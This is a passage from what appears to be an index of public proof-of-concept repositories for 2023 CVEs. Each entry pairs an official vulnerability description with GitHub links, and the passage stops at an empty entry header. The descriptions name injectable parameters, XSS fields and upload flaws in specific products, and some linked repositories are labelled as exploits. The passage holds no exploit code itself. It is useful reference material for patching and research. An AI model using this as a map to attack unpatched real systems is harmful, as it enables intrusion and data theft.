Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache InLong. This issue affects Apache InLong: from 1.4.0 through 1.8.0; the attacker can create misleading or false records, making it harder to audit and trace malicious activities. Users are advised to upgrade to Apache InLong's 1.8.0 or cherry-pick [1] to solve it.

[1] https://github.com/apache/inlong/pull/8628

- [miguelc49/CVE-2023-43667-2](https://github.com/miguelc49/CVE-2023-43667-2)
- [miguelc49/CVE-2023-43667-1](https://github.com/miguelc49/CVE-2023-43667-1)
- [miguelc49/CVE-2023-43667-3](https://github.com/miguelc49/CVE-2023-43667-3)

### CVE-2023-43757 (2023-11-16)

Inadequate encryption strength vulnerability in multiple routers provided by ELECOM CO.,LTD. and LOGITEC CORPORATION allows a network-adjacent unauthenticated attacker to guess the encryption key used for wireless LAN communication and intercept the communication. As for the affected products/versions, see the information provided by the vendor under [References] section.

- [sharmashreejaa/CVE-2023-43757](https://github.com/sharmashreejaa/CVE-2023-43757)

### CVE-2023-43770 (2023-09-22)

Roundcube before 1.4.14, 1.5.x before 1.5.4, and 1.6.x before 1.6.3 allows XSS via text/plain e-mail messages with crafted links because of program/lib/Roundcube/rcube_string_replacer.php behavior.

- [s3cb0y/CVE-2023-43770-POC](https://github.com/s3cb0y/CVE-2023-43770-POC)
- [knight0x07/CVE-2023-43770-PoC](https://github.com/knight0x07/CVE-2023-43770-PoC)

### CVE-2023-43786 (2023-10-10)

A vulnerability was found in libX11 due to an infinite loop within the PutSubImage() function. This flaw allows a local user to consume all available system resources and cause a denial of service condition.

- [jfrog/jfrog-CVE-2023-43786-libX11_DoS](https://github.com/jfrog/jfrog-CVE-2023-43786-libX11_DoS)

### CVE-2023-43838 (2023-10-04)

An arbitrary file upload vulnerability in Personal Management System v1.4.64 allows attackers to execute arbitrary code via uploading a crafted SVG file into a user profile's avatar.

- [rootd4ddy/CVE-2023-43838](https://github.com/rootd4ddy/CVE-2023-43838)

### CVE-2023-43871 (2023-09-28)

A File upload vulnerability in WBCE v.1.6.1 allows a local attacker to upload a pdf file with hidden Cross Site Scripting (XSS).

- [sromanhu/CVE-2023-43871-WBCE-Arbitrary-File-Upload--XSS---Media](https://github.com/sromanhu/CVE-2023-43871-WBCE-Arbitrary-File-Upload--XSS---Media)

### CVE-2023-43872 (2023-09-28)

A File upload vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to upload a pdf file with hidden Cross Site Scripting (XSS).

- [sromanhu/CVE-2023-43872-CMSmadesimple-Arbitrary-File-Upload--XSS---File-Manager](https://github.com/sromanhu/CVE-2023-43872-CMSmadesimple-Arbitrary-File-Upload--XSS---File-Manager)

### CVE-2023-43873 (2023-09-28)

A Cross Site Scripting (XSS) vulnerability in e107 CMS v.2.3.2 allows a local attacker to execute arbitrary code via a crafted script to the Name field in the Manage Menu.

- [sromanhu/CVE-2023-43873-e107-CMS-Stored-XSS---Manage](https://github.com/sromanhu/CVE-2023-43873-e107-CMS-Stored-XSS---Manage)

### CVE-2023-43874 (2023-09-28)

Multiple Cross Site Scripting (XSS) vulnerabilities in e107 CMS v.2.3.2 allow a local attacker to execute arbitrary code via a crafted script to the Copyright and Author fields in the Meta & Custom Tags Menu.

- [sromanhu/CVE-2023-43874-e107-CMS-Stored-XSS---MetaCustomTags](https://github.com/sromanhu/CVE-2023-43874-e107-CMS-Stored-XSS---MetaCustomTags)

### CVE-2023-43875 (2023-10-19)

Multiple Cross-Site Scripting (XSS) vulnerabilities in the installation of Subrion CMS v.4.2.1 allow a local attacker to execute arbitrary web scripts via a crafted payload injected into the dbhost, dbname, dbuser, adminusername and adminemail fields.

- [sromanhu/CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation](https://github.com/sromanhu/CVE-2023-43875-Subrion-CMS-Reflected-XSS---Installation)

### CVE-2023-43876 (2023-09-28)

A Cross-Site Scripting (XSS) vulnerability in installation of October v.3.4.16 allows an attacker to execute arbitrary web scripts via a crafted payload injected into the dbhost field.

- [sromanhu/CVE-2023-43876-October-CMS-Reflected-XSS---Installation](https://github.com/sromanhu/CVE-2023-43876-October-CMS-Reflected-XSS---Installation)

### CVE-2023-43877 (2023-10-04)

Rite CMS 3.0 has Multiple Cross-Site scripting (XSS) vulnerabilities that allow attackers to execute arbitrary code via a payload crafted in the Home Page fields in the Administration menu.

- [sromanhu/CVE-2023-43877-RiteCMS-Stored-XSS---Home](https://github.com/sromanhu/CVE-2023-43877-RiteCMS-Stored-XSS---Home)

### CVE-2023-43878 (2023-09-28)

Rite CMS 3.0 has Multiple Cross-Site scripting (XSS) vulnerabilities that allow attackers to execute arbitrary code via a crafted payload into the Main Menu Items in the Administration Menu.

- [sromanhu/CVE-2023-43878-RiteCMS-Stored-XSS---MainMenu](https://github.com/sromanhu/CVE-2023-43878-RiteCMS-Stored-XSS---MainMenu)

### CVE-2023-43879 (2023-09-28)

Rite CMS 3.0 has a Cross-Site scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload into the Global Content Blocks in the Administration Menu.

- [sromanhu/CVE-2023-43879-RiteCMS-Stored-XSS---GlobalContent](https://github.com/sromanhu/CVE-2023-43879-RiteCMS-Stored-XSS---GlobalContent)

### CVE-2023-43955 (2023-12-27)

The com.phlox.tvwebbrowser TV Bro application through 2.0.0 for Android mishandles external intents through WebView. This allows attackers to execute arbitrary code, create arbitrary files, and perform arbitrary downloads via JavaScript that uses takeBlobDownloadData.

- [actuator/com.phlox.tvwebbrowser](https://github.com/actuator/com.phlox.tvwebbrowser)

### CVE-2023-44061 (2023-10-06)

File Upload vulnerability in Simple and Nice Shopping Cart Script v.1.0 allows a remote attacker to execute arbitrary code via the upload function in the edit profile component.

- [soundarkutty/CVE-2023-44061](https://github.com/soundarkutty/CVE-2023-44061)

### CVE-2023-44451 (2024-05-03)

Linux Mint Xreader EPUB File Parsing Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Linux Mint Xreader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the parsing of EPUB files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-21897.

- [febinrev/slippy-book-exploit](https://github.com/febinrev/slippy-book-exploit)

### CVE-2023-44452 (2024-05-03)

Linux Mint Xreader CBT File Parsing Argument Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Linux Mint Xreader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the parsing of CBT files. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-22132.

- [febinrev/atril_cbt-inject-exploit](https://github.com/febinrev/atril_cbt-inject-exploit)

### CVE-2023-44487 (2023-10-10)

The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.

- [bcdannyboy/CVE-2023-44487](https://github.com/bcdannyboy/CVE-2023-44487)
- [imabee101/CVE-2023-44487](https://github.com/imabee101/CVE-2023-44487)
- [ByteHackr/CVE-2023-44487](https://github.com/ByteHackr/CVE-2023-44487)
- [pabloec20/rapidreset](https://github.com/pabloec20/rapidreset)
- [secengjeff/rapidresetclient](https://github.com/secengjeff/rapidresetclient)
- [studiogangster/CVE-2023-44487](https://github.com/studiogangster/CVE-2023-44487)
- [ReToCode/golang-CVE-2023-44487](https://github.com/ReToCode/golang-CVE-2023-44487)
- [ndrscodes/http2-rst-stream-attacker](https://github.com/ndrscodes/http2-rst-stream-attacker)
- [nxenon/cve-2023-44487](https://github.com/nxenon/cve-2023-44487)
- [terrorist/HTTP-2-Rapid-Reset-Client](https://github.com/terrorist/HTTP-2-Rapid-Reset-Client)
- [sigridou/CVE-2023-44487-](https://github.com/sigridou/CVE-2023-44487-)
- [TYuan0816/cve-2023-44487](https://github.com/TYuan0816/cve-2023-44487)
- [sn130hk/CVE-2023-44487](https://github.com/sn130hk/CVE-2023-44487)

### CVE-2023-44758 (2023-10-06)

GDidees CMS 3.0 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Page Title.

- [sromanhu/CVE-2023-44758_GDidees-CMS-Stored-XSS---Title](https://github.com/sromanhu/CVE-2023-44758_GDidees-CMS-Stored-XSS---Title)

### CVE-2023-44760 (2023-10-23)

Multiple Cross Site Scripting (XSS) vulnerabilities in Concrete CMS v.9.2.1 allow an attacker to execute arbitrary code via a crafted script to the Header and Footer Tracking Codes of the SEO & Statistics. NOTE: the vendor disputes this because these header/footer changes can only be made by an admin, and allowing an admin to place JavaScript there is an intentional customization feature. Also, the exploitation method claimed by "sromanhu" does not provide any access to a Concrete CMS session, because the Concrete CMS session cookie is configured as HttpOnly.

- [sromanhu/CVE-2023-44760_ConcreteCMS-Stored-XSS---TrackingCodes](https://github.com/sromanhu/CVE-2023-44760_ConcreteCMS-Stored-XSS---TrackingCodes)

### CVE-2023-44761 (2023-10-06)

Multiple Cross Site Scripting (XSS) vulnerabilities in Concrete CMS versions 8.5.13 and below, and 9.0.0 through 9.2.1, allow a local attacker to execute arbitrary code via a crafted script to the Forms of the Data objects.

- [sromanhu/CVE-2023-44761_ConcreteCMS-Stored-XSS---Forms](https://github.com/sromanhu/CVE-2023-44761_ConcreteCMS-Stored-XSS---Forms)

### CVE-2023-44762 (2023-10-06)

A Cross Site Scripting (XSS) vulnerability in Concrete CMS from versions 9.2.0 to 9.2.2 allows an attacker to execute arbitrary code via a crafted script to the Tags from Settings - Tags.

- [sromanhu/CVE-2023-44762_ConcreteCMS-Reflected-XSS---Tags](https://github.com/sromanhu/CVE-2023-44762_ConcreteCMS-Reflected-XSS---Tags)

### CVE-2023-44763 (2023-10-10)

Concrete CMS v9.2.1 is affected by an Arbitrary File Upload vulnerability via a Thumbnail file upload, which allows Cross-Site Scripting (XSS). NOTE: the vendor's position is that a customer is supposed to know that "pdf" should be excluded from the allowed file types, even though pdf is one of the allowed file types in the default configuration.

- [sromanhu/CVE-2023-44763_ConcreteCMS-Arbitrary-file-upload-Thumbnail](https://github.com/sromanhu/CVE-2023-44763_ConcreteCMS-Arbitrary-file-upload-Thumbnail)

### CVE-2023-44764 (2023-10-06)

A Cross Site Scripting (XSS) vulnerability in Concrete CMS before 9.2.3 exists via the Name parameter during installation (aka Site of Installation or Settings).

- [sromanhu/CVE-2023-44764_ConcreteCMS-Stored-XSS---Site_Installation](https://github.com/sromanhu/CVE-2023-44764_ConcreteCMS-Stored-XSS---Site_Installation)

### CVE-2023-44765 (2023-10-06)

A Cross Site Scripting (XSS) vulnerability in Concrete CMS versions 8.5.12 and below, and 9.0 through 9.2.1 allows an attacker to execute arbitrary code via a crafted script to Plural Handle of the Data Objects from System & Settings.

- [sromanhu/CVE-2023-44765_ConcreteCMS-Stored-XSS---Associations](https://github.com/sromanhu/CVE-2023-44765_ConcreteCMS-Stored-XSS---Associations)

### CVE-2023-44766 (2023-10-06)

A Cross Site Scripting (XSS) vulnerability in Concrete CMS v.9.2.1 allows an attacker to execute arbitrary code via a crafted script to the SEO - Extra from Page Settings. NOTE: the vendor disputes this because this SEO-related header change can only be made by an admin, and allowing an admin to place JavaScript there is an intentional customization feature.

- [sromanhu/CVE-2023-44766_ConcreteCMS-Stored-XSS---SEO](https://github.com/sromanhu/CVE-2023-44766_ConcreteCMS-Stored-XSS---SEO)

### CVE-2023-44767 (2023-10-24)

A File upload vulnerability in RiteCMS 3.0 allows a local attacker to upload a SVG file with XSS content.

- [sromanhu/CVE-2023-44767_RiteCMS-File-Upload--XSS---Filemanager](https://github.com/sromanhu/CVE-2023-44767_RiteCMS-File-Upload--XSS---Filemanager)

### CVE-2023-44769 (2023-10-24)

A Cross-Site Scripting (XSS) vulnerability in Zenario CMS v.9.4.59197 allows a local attacker to execute arbitrary code via a crafted script to the Spare aliases from Alias.

- [sromanhu/CVE-2023-44769_ZenarioCMS--Reflected-XSS---Alias](https://github.com/sromanhu/CVE-2023-44769_ZenarioCMS--Reflected-XSS---Alias)

### CVE-2023-44770 (2023-10-06)

A Cross-Site Scripting (XSS) vulnerability in Zenario CMS v.9.4.59197 allows an attacker to execute arbitrary code via a crafted script to the Organizer - Spare alias.

- [sromanhu/CVE-2023-44770_ZenarioCMS--Reflected-XSS---Organizer-Alias](https://github.com/sromanhu/CVE-2023-44770_ZenarioCMS--Reflected-XSS---Organizer-Alias)

### CVE-2023-44771 (2023-10-06)

A Cross-Site Scripting (XSS) vulnerability in Zenario CMS v.9.4.59197 allows a local attacker to execute arbitrary code via a crafted script to the Page Layout.

- [sromanhu/CVE-2023-44771_ZenarioCMS--Stored-XSS---Page-Layout](https://github.com/sromanhu/CVE-2023-44771_ZenarioCMS--Stored-XSS---Page-Layout)

### CVE-2023-44811 (2023-10-09)

Cross Site Request Forgery (CSRF) vulnerability in MooSocial v.3.1.8 allows a remote attacker to execute arbitrary code and obtain sensitive information via the admin Password Change Function.

- [ahrixia/CVE-2023-44811](https://github.com/ahrixia/CVE-2023-44811)

### CVE-2023-44812 (2023-10-09)

Cross Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the admin_redirect_url parameter of the user login function.

- [ahrixia/CVE-2023-44812](https://github.com/ahrixia/CVE-2023-44812)

### CVE-2023-44813 (2023-10-09)

Cross Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the mode parameter of the invite friend login function.

- [ahrixia/CVE-2023-44813](https://github.com/ahrixia/CVE-2023-44813)

### CVE-2023-44961 (2023-10-11)

SQL Injection vulnerability in Koha Library Software 23.0.5.04 and before allows a remote attacker to obtain sensitive information via the intranet/cgi bin/cataloging/ysearch.pl component.

- [ggb0n/CVE-2023-44961](https://github.com/ggb0n/CVE-2023-44961)

### CVE-2023-44962 (2023-10-11)

File Upload vulnerability in Koha Library Software 23.05.04 and before allows a remote attacker to read arbitrary files via the upload-cover-image.pl component.

- [ggb0n/CVE-2023-44962](https://github.com/ggb0n/CVE-2023-44962)

### CVE-2023-44976
- [keowu/BadRentdrv2](https://github.com/keowu/BadRentdrv2)

### CVE-2023-45158 (2023-10-16)

An OS command injection vulnerability exists in web2py 2.24.1 and earlier. When the product is configured to use notifySendHandler for logging (not the default configuration), a crafted web request may execute an arbitrary OS command on the web server using the product.

- [Evan-Zhangyf/CVE-2023-45158](https://github.com/Evan-Zhangyf/CVE-2023-45158)

### CVE-2023-45182 (2023-12-14)

IBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 is vulnerable to having its key for an encrypted password decoded. By somehow gaining access to the encrypted password, a local attacker could exploit this vulnerability to obtain the password to other systems. IBM X-Force ID: 268265.

- [afine-com/CVE-2023-45182](https://github.com/afine-com/CVE-2023-45182)

### CVE-2023-45184 (2023-12-14)

IBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 could allow an attacker to obtain a decryption key due to improper authority checks. IBM X-Force ID: 268270.

- [afine-com/CVE-2023-45184](https://github.com/afine-com/CVE-2023-45184)

### CVE-2023-45185 (2023-12-14)

IBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 could allow an attacker to execute remote code. Due to improper authority checks the attacker could perform operations on the PC under the user's authority. IBM X-Force ID: 268273.

- [afine-com/CVE-2023-45185](https://github.com/afine-com/CVE-2023-45185)

### CVE-2023-45239 (2023-10-06)

A lack of input validation exists in tac_plus prior to commit 4fdf178 which, when pre or post auth commands are enabled, allows an attacker who can control the username, rem-addr, or NAC address sent to tac_plus to inject shell commands and gain remote code execution on the tac_plus server.

- [takeshixx/tac_plus-pre-auth-rce](https://github.com/takeshixx/tac_plus-pre-auth-rce)

### CVE-2023-45280 (2023-10-19)

Yamcs 5.8.6 allows XSS (issue 2 of 2). It comes with a Bucket as its primary storage mechanism. Buckets allow for the upload of any file. There's a way to upload an HTML file containing arbitrary JavaScript and then navigate to it. Once the user opens the file, the browser will execute the arbitrary JavaScript.

- [miguelc49/CVE-2023-45280-1](https://github.com/miguelc49/CVE-2023-45280-1)
- [miguelc49/CVE-2023-45280-3](https://github.com/miguelc49/CVE-2023-45280-3)
- [miguelc49/CVE-2023-45280-2](https://github.com/miguelc49/CVE-2023-45280-2)

### CVE-2023-45288 (2024-04-04)

An attacker may cause an HTTP/2 endpoint to read arbitrary amounts of header data by sending an excessive number of CONTINUATION frames. Maintaining HPACK state requires parsing and processing all HEADERS and CONTINUATION frames on a connection. When a request's headers exceed MaxHeaderBytes, no memory is allocated to store the excess headers, but they are still parsed. This permits an attacker to cause an HTTP/2 endpoint to read arbitrary amounts of header data, all associated with a request which is going to be rejected. These headers can include Huffman-encoded data which is significantly more expensive for the receiver to decode than for an attacker to send. The fix sets a limit on the amount of excess header frames we will process before closing a connection.

- [hex0punk/cont-flood-poc](https://github.com/hex0punk/cont-flood-poc)

### CVE-2023-45471 (2023-10-20)

The QAD Search Server is vulnerable to Stored Cross-Site Scripting (XSS) in versions up to, and including, 1.0.0.315 due to insufficient checks on indexes. This makes it possible for unauthenticated attackers to create a new index and inject a malicious web script into its name, that will execute whenever a user accesses the search page.

- [mehdibelhajamor/CVE-2023-45471](https://github.com/mehdibelhajamor/CVE-2023-45471)

### CVE-2023-45503 (2024-04-15)

SQL Injection vulnerability in Macrob7 Macs CMS 1.1.4f, allows remote attackers to execute arbitrary code, cause a denial of service (DoS), escalate privileges, and obtain sensitive information via crafted payload to resetPassword, forgotPasswordProcess, saveUser, saveRole, deleteUser, deleteRole, deleteComment, deleteUser, allowComment, saveRole, forgotPasswordProcess, resetPassword, saveUser, addComment, saveRole, and saveUser endpoints.

- [ally-petitt/CVE-2023-45503](https://github.com/ally-petitt/CVE-2023-45503)

### CVE-2023-45540 (2023-10-16)

An issue in Jorani Leave Management System 1.0.3 allows a remote attacker to execute arbitrary HTML code via a crafted script to the comment field of the List of Leave requests page.

- [soundarkutty/CVE-2023-45540](https://github.com/soundarkutty/CVE-2023-45540)

### CVE-2023-45542 (2023-10-16)

Cross Site Scripting vulnerability in mooSocial 3.1.8 allows a remote attacker to obtain sensitive information via a crafted script to the q parameter in the Search function.

- [ahrixia/CVE-2023-45542](https://github.com/ahrixia/CVE-2023-45542)

### CVE-2023-45657 (2023-11-06)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in POSIMYTH Nexter allows SQL Injection. This issue affects Nexter: from n/a through 2.0.3.

- [RandomRobbieBF/CVE-2023-45657](https://github.com/RandomRobbieBF/CVE-2023-45657)

### CVE-2023-45777 (2023-12-04)

In checkKeyIntentParceledCorrectly of AccountManagerService.java, there is a possible way to launch arbitrary activities using system privileges due to Parcel Mismatch. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

- [michalbednarski/TheLastBundleMismatch](https://github.com/michalbednarski/TheLastBundleMismatch)

### CVE-2023-45779 (2023-12-04)

In the APEX module framework of AOSP, there is a possible malicious update to platform components due to improperly used crypto. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. More details on this can be found in the referenced links.

- [metaredteam/rtx-cve-2023-45779](https://github.com/metaredteam/rtx-cve-2023-45779)

### CVE-2023-45827 (2023-11-06)

Dot diver is a lightweight, powerful, and dependency-free TypeScript utility library that provides types and functions to work with object paths in dot notation. In versions prior to 1.0.2 there is a Prototype Pollution vulnerability in the `setByPath` function which can lead to remote code execution (RCE). This issue has been addressed in commit `98daf567` which has been included in release 1.0.2. Users are advised to upgrade. There are no known workarounds to this vulnerability.

- [200101WhoAmI/CVE-2023-45827](https://github.com/200101WhoAmI/CVE-2023-45827)

### CVE-2023-45828
- [RandomRobbieBF/CVE-2023-45828](https://github.com/RandomRobbieBF/CVE-2023-45828)

### CVE-2023-45857 (2023-11-08)

An issue discovered in Axios 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.

- [valentin-panov/CVE-2023-45857](https://github.com/valentin-panov/CVE-2023-45857)
- [intercept6/CVE-2023-45857-Demo](https://github.com/intercept6/CVE-2023-45857-Demo)
- [fuyuooumi1027/CVE-2023-45857-Demo](https://github.com/fuyuooumi1027/CVE-2023-45857-Demo)

### CVE-2023-45866 (2023-12-08)

Bluetooth HID Hosts in BlueZ may permit an unauthenticated Peripheral role HID Device to initiate and establish an encrypted connection, and accept HID keyboard reports, potentially permitting injection of HID messages when no user interaction has occurred in the Central role to authorize such access. An example affected package is bluez 5.64-0ubuntu1 in Ubuntu 22.04LTS. NOTE: in some cases, a CVE-2020-0556 mitigation would have already addressed this Bluetooth HID Hosts issue.

- [pentestfunctions/BlueDucky](https://github.com/pentestfunctions/BlueDucky)
- [Eason-zz/BluetoothDucky](https://github.com/Eason-zz/BluetoothDucky)
- [jjjjjjjj987/cve-2023-45866-py](https://github.com/jjjjjjjj987/cve-2023-45866-py)
- [cisnarfu/Bluepop](https://github.com/cisnarfu/Bluepop)
- [AvishekDhakal/CVE-2023-45866_EXPLOITS](https://github.com/AvishekDhakal/CVE-2023-45866_EXPLOITS)
- [Chedrian07/CVE-2023-45866-POC](https://github.com/Chedrian07/CVE-2023-45866-POC)

### CVE-2023-45966 (2023-10-23)

umputun remark42 version 1.12.1 and before has a Blind Server-Side Request Forgery (SSRF) vulnerability.

- [jet-pentest/CVE-2023-45966](https://github.com/jet-pentest/CVE-2023-45966)

### CVE-2023-45992 (2023-10-19)

A vulnerability in the web-based interface of the RUCKUS Cloudpath product on version 5.12 build 5538 or before could allow a remote, unauthenticated attacker to execute persistent XSS and CSRF attacks against a user of the admin management interface. A successful attack, combined with a certain admin activity, could allow the attacker to gain full admin privileges on the exploited system.

- [harry935/CVE-2023-45992](https://github.com/harry935/CVE-2023-45992)

### CVE-2023-46003 (2023-10-21)

I-doit pro 25 and below is vulnerable to Cross Site Scripting (XSS) via index.php.

- [leekenghwa/CVE-2023-46003](https://github.com/leekenghwa/CVE-2023-46003)

### CVE-2023-46012 (2024-05-07)

Buffer Overflow vulnerability in LINKSYS EA7500 3.0.1.207964 allows a remote attacker to execute arbitrary code via an HTTP request to the IGD UPnP.

- [dest-3/CVE-2023-46012](https://github.com/dest-3/CVE-2023-46012)

### CVE-2023-46014 (2023-11-13)

SQL Injection vulnerability in hospitalLogin.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via 'hemail' and 'hpassword' parameters.

- [ersinerenler/CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability)

### CVE-2023-46015 (2023-11-13)

Cross Site Scripting (XSS) vulnerability in index.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via 'msg' parameter in application URL.

- [ersinerenler/CVE-2023-46015-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46015-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability)

### CVE-2023-46016 (2023-11-13)

Cross Site Scripting (XSS) in abs.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'search' parameter in the application URL.

- [ersinerenler/CVE-2023-46016-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46016-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability)

### CVE-2023-46017 (2023-11-13)

SQL Injection vulnerability in receiverLogin.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via 'remail' and 'rpassword' parameters.

- [ersinerenler/CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability)

### CVE-2023-46018 (2023-11-13)

SQL injection vulnerability in receiverReg.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via 'remail' parameter.

- [ersinerenler/CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability)

### CVE-2023-46019 (2023-11-13)

Cross Site Scripting (XSS) vulnerability in abs.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'error' parameter.

- [ersinerenler/CVE-2023-46019-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46019-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability)

### CVE-2023-46020 (2023-11-13)

Cross Site Scripting (XSS) in updateprofile.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'rename', 'remail', 'rphone' and 'rcity' parameters.

- [ersinerenler/CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability](https://github.com/ersinerenler/CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability)

### CVE-2023-46021 (2023-11-13)

SQL Injection vulnerability in cancel.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary commands via the 'reqid' parameter.

- [ersinerenler/CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability)

### CVE-2023-46022 (2023-11-14)

SQL Injection vulnerability in delete.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via the 'bid' parameter.

- [ersinerenler/CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability](https://github.com/ersinerenler/CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability)

### CVE-2023-46197 (2024-05-17)

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in supsystic.Com Popup by Supsystic allows Relative Path Traversal. This issue affects Popup by Supsystic: from n/a through 1.10.19.

- [RandomRobbieBF/CVE-2023-46197](https://github.com/RandomRobbieBF/CVE-2023-46197)

### CVE-2023-46303 (2023-10-22)

link_to_local_path in ebooks/conversion/plugins/html_input.py in calibre before 6.19.0 can, by default, add resources outside of the document root.

- [0x1717/ssrf-via-img](https://github.com/0x1717/ssrf-via-img)

### CVE-2023-46304 (2024-04-30)

modules/Users/models/Module.php in Vtiger CRM 7.5.0 allows a remote authenticated attacker to run arbitrary PHP code because an unprotected endpoint allows them to write this code to the config.inc.php file (executed on every page load).

- [jselliott/CVE-2023-46304](https://github.com/jselliott/CVE-2023-46304)

### CVE-2023-46344 (2024-02-02)

A vulnerability in Solar-Log Base 15 Firmware 6.0.1 Build 161, and possibly other Solar-Log Base products, allows an attacker to escalate their privileges by exploiting a stored cross-site scripting (XSS) vulnerability in the switch group function under /#ilang=DE&b=c_smartenergy_swgroups in the web portal. The vulnerability can be exploited to gain the rights of an installer or PM, which can then be used to gain administrative access to the web portal and execute further attacks.

- [vinnie1717/CVE-2023-46344](https://github.com/vinnie1717/CVE-2023-46344)

### CVE-2023-46371 (2023-10-24)

TP-Link device TL-WDR7660 2.0.30 and TL-WR886N 2.0.12 has a stack overflow vulnerability via the function upgradeInfoJsonToBin.

- [Jianchun-Ding/CVE-poc-update](https://github.com/Jianchun-Ding/CVE-poc-update)

### CVE-2023-46404 (2023-11-03)

PCRS <= 3.11 (d0de1e) “Questions” page and “Code editor” page are vulnerable to remote code execution (RCE) by escaping Python sandboxing.

- [windecks/CVE-2023-46404](https://github.com/windecks/CVE-2023-46404)

### CVE-2023-46442 (-)

An infinite loop in the retrieveActiveBody function of Soot before v4.4.1 under Java 8 allows attackers to cause a Denial of Service (DoS).

- [JAckLosingHeart/CVE-2023-46442_POC](https://github.com/JAckLosingHeart/CVE-2023-46442_POC)

### CVE-2023-46447 (2024-01-20)

The POPS! Rebel application 5.0 for Android, in POPS! Rebel Bluetooth Glucose Monitoring System, sends unencrypted glucose measurements over BLE.

- [actuator/rebel](https://github.com/actuator/rebel)

### CVE-2023-46449 (2023-10-26)

Sourcecodester Free and Open Source inventory management system v1.0 is vulnerable to Incorrect Access Control. An arbitrary user can change the password of another user and take over the account via IDOR in the password change function.

- [sajaljat/CVE-2023-46449](https://github.com/sajaljat/CVE-2023-46449)

### CVE-2023-46450 (2023-10-26)

Sourcecodester Free and Open Source inventory management system 1.0 is vulnerable to Cross Site Scripting (XSS) via the Add supplier function.

- [yte121/-CVE-2023-46450](https://github.com/yte121/-CVE-2023-46450)

### CVE-2023-46451 (2023-10-31)

Best Courier Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in the change username field.

- [sajaljat/CVE-2023-46451](https://github.com/sajaljat/CVE-2023-46451)

### CVE-2023-46454 (2023-12-12)

In GL.iNET GL-AR300M routers with firmware v4.3.7, it is possible to inject arbitrary shell commands through a crafted package name in the package information functionality.

- [cyberaz0r/GL.iNet-Multiple-Vulnerabilities](https://github.com/cyberaz0r/GL.iNet-Multiple-Vulnerabilities)

### CVE-2023-46474 (2024-01-11)

File Upload vulnerability in PMB v.7.4.8 allows a remote attacker to execute arbitrary code and escalate privileges via a crafted PHP file uploaded to the start_import.php file.

- [Xn2/CVE-2023-46474](https://github.com/Xn2/CVE-2023-46474)

### CVE-2023-46478 (2023-10-30)

